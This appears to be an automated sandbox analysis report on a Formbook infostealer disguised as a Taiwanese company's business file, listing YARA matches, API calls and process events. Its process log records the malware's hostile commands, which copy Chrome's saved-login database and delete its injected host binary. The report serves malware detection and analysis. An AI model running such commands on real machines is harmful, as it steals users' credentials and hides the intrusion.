Source: 5.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.image.exe.2d15fd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 2.2.image.exe.3d81990.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.image.exe.3d81990.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB142C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,		0_2_00007FF6EB142C54
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB141C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,		0_2_00007FF6EB141C0C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00A4B150 appears 35 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04E6B150 appears 35 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004185E0 NtCreateFile,	5_2_004185E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00418690 NtReadFile,	5_2_00418690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00418710 NtClose,	5_2_00418710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004187C0 NtAllocateVirtualMemory,	5_2_004187C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004185DA NtCreateFile,	5_2_004185DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041870A NtClose,	5_2_0041870A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004187BF NtAllocateVirtualMemory,	5_2_004187BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A898F0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_00A898F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_00A89860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89840 NtDelayExecution,LdrInitializeThunk,	5_2_00A89840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A899A0 NtCreateSection,LdrInitializeThunk,	5_2_00A899A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_00A89910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89A20 NtResumeThread,LdrInitializeThunk,	5_2_00A89A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89A00 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00A89A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89A50 NtCreateFile,LdrInitializeThunk,	5_2_00A89A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A895D0 NtClose,LdrInitializeThunk,	5_2_00A895D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89540 NtReadFile,LdrInitializeThunk,	5_2_00A89540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A896E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_00A896E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_00A89660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A897A0 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_00A897A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89780 NtMapViewOfSection,LdrInitializeThunk,	5_2_00A89780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89FE0 NtCreateMutant,LdrInitializeThunk,	5_2_00A89FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89710 NtQueryInformationToken,LdrInitializeThunk,	5_2_00A89710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A898A0 NtWriteVirtualMemory,	5_2_00A898A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89820 NtEnumerateKey,	5_2_00A89820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A8B040 NtSuspendThread,	5_2_00A8B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A899D0 NtCreateProcessEx,	5_2_00A899D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89950 NtQueueApcThread,	5_2_00A89950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89A80 NtOpenDirectoryObject,	5_2_00A89A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89A10 NtQuerySection,	5_2_00A89A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A8A3B0 NtGetContextThread,	5_2_00A8A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89B00 NtSetValueKey,	5_2_00A89B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A895F0 NtQueryInformationFile,	5_2_00A895F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89520 NtWaitForSingleObject,	5_2_00A89520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A8AD30 NtSetContextThread,	5_2_00A8AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89560 NtWriteFile,	5_2_00A89560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A896D0 NtCreateKey,	5_2_00A896D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89610 NtEnumerateValueKey,	5_2_00A89610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89670 NtQueryInformationProcess,	5_2_00A89670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89650 NtQueryValueKey,	5_2_00A89650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89730 NtQueryVirtualMemory,	5_2_00A89730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A8A710 NtOpenProcessToken,	5_2_00A8A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89760 NtOpenProcess,	5_2_00A89760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A89770 NtSetInformationFile,	5_2_00A89770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A8A770 NtOpenThread,	5_2_00A8A770
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9860 NtQuerySystemInformation,LdrInitializeThunk,	11_2_04EA9860
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9840 NtDelayExecution,LdrInitializeThunk,	11_2_04EA9840
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA95D0 NtClose,LdrInitializeThunk,	11_2_04EA95D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA99A0 NtCreateSection,LdrInitializeThunk,	11_2_04EA99A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9540 NtReadFile,LdrInitializeThunk,	11_2_04EA9540
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_04EA9910
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA96E0 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_04EA96E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA96D0 NtCreateKey,LdrInitializeThunk,	11_2_04EA96D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9660 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_04EA9660
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9650 NtQueryValueKey,LdrInitializeThunk,	11_2_04EA9650
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9A50 NtCreateFile,LdrInitializeThunk,	11_2_04EA9A50
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9610 NtEnumerateValueKey,LdrInitializeThunk,	11_2_04EA9610
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9FE0 NtCreateMutant,LdrInitializeThunk,	11_2_04EA9FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9780 NtMapViewOfSection,LdrInitializeThunk,	11_2_04EA9780
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9B00 NtSetValueKey,LdrInitializeThunk,	11_2_04EA9B00
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9710 NtQueryInformationToken,LdrInitializeThunk,	11_2_04EA9710
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA98F0 NtReadVirtualMemory,	11_2_04EA98F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA98A0 NtWriteVirtualMemory,	11_2_04EA98A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EAB040 NtSuspendThread,	11_2_04EAB040
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9820 NtEnumerateKey,	11_2_04EA9820
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA95F0 NtQueryInformationFile,	11_2_04EA95F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA99D0 NtCreateProcessEx,	11_2_04EA99D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9560 NtWriteFile,	11_2_04EA9560
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9950 NtQueueApcThread,	11_2_04EA9950
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9520 NtWaitForSingleObject,	11_2_04EA9520
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EAAD30 NtSetContextThread,	11_2_04EAAD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9A80 NtOpenDirectoryObject,	11_2_04EA9A80
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9670 NtQueryInformationProcess,	11_2_04EA9670
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9A20 NtResumeThread,	11_2_04EA9A20
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9A00 NtProtectVirtualMemory,	11_2_04EA9A00
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9A10 NtQuerySection,	11_2_04EA9A10
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA97A0 NtUnmapViewOfSection,	11_2_04EA97A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EAA3B0 NtGetContextThread,	11_2_04EAA3B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9760 NtOpenProcess,	11_2_04EA9760
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9770 NtSetInformationFile,	11_2_04EA9770
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EAA770 NtOpenThread,	11_2_04EAA770
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA9730 NtQueryVirtualMemory,	11_2_04EA9730
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EAA710 NtOpenProcessToken,	11_2_04EAA710
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E585E0 NtCreateFile,	11_2_00E585E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E58690 NtReadFile,	11_2_00E58690
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E587C0 NtAllocateVirtualMemory,	11_2_00E587C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E58710 NtClose,	11_2_00E58710
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E585DA NtCreateFile,	11_2_00E585DA
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E587BF NtAllocateVirtualMemory,	11_2_00E587BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E5870A NtClose,	11_2_00E5870A

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 649658 bytes, 1 file

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Binary or memory string: OriginalFilename vs 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000003.290884636.00000268D6D00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSZArrayHelp.exe6 vs 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000003.291017386.00000268D4EDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSZArrayHelp.exe6 vs 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Source: image.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\image.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/8@30/14

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB14473C CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,

0_2_00007FF6EB14473C

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB145050 FindResourceA,SizeofResource,FindResourceA,LoadResource,LockResource,memcpy_s,FreeResource,

0_2_00007FF6EB145050

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Virustotal: Detection: 42%
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	ReversingLabs: Detection: 59%

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe "C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe"
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe "C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe"
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe "C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe"
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe "C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe "C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
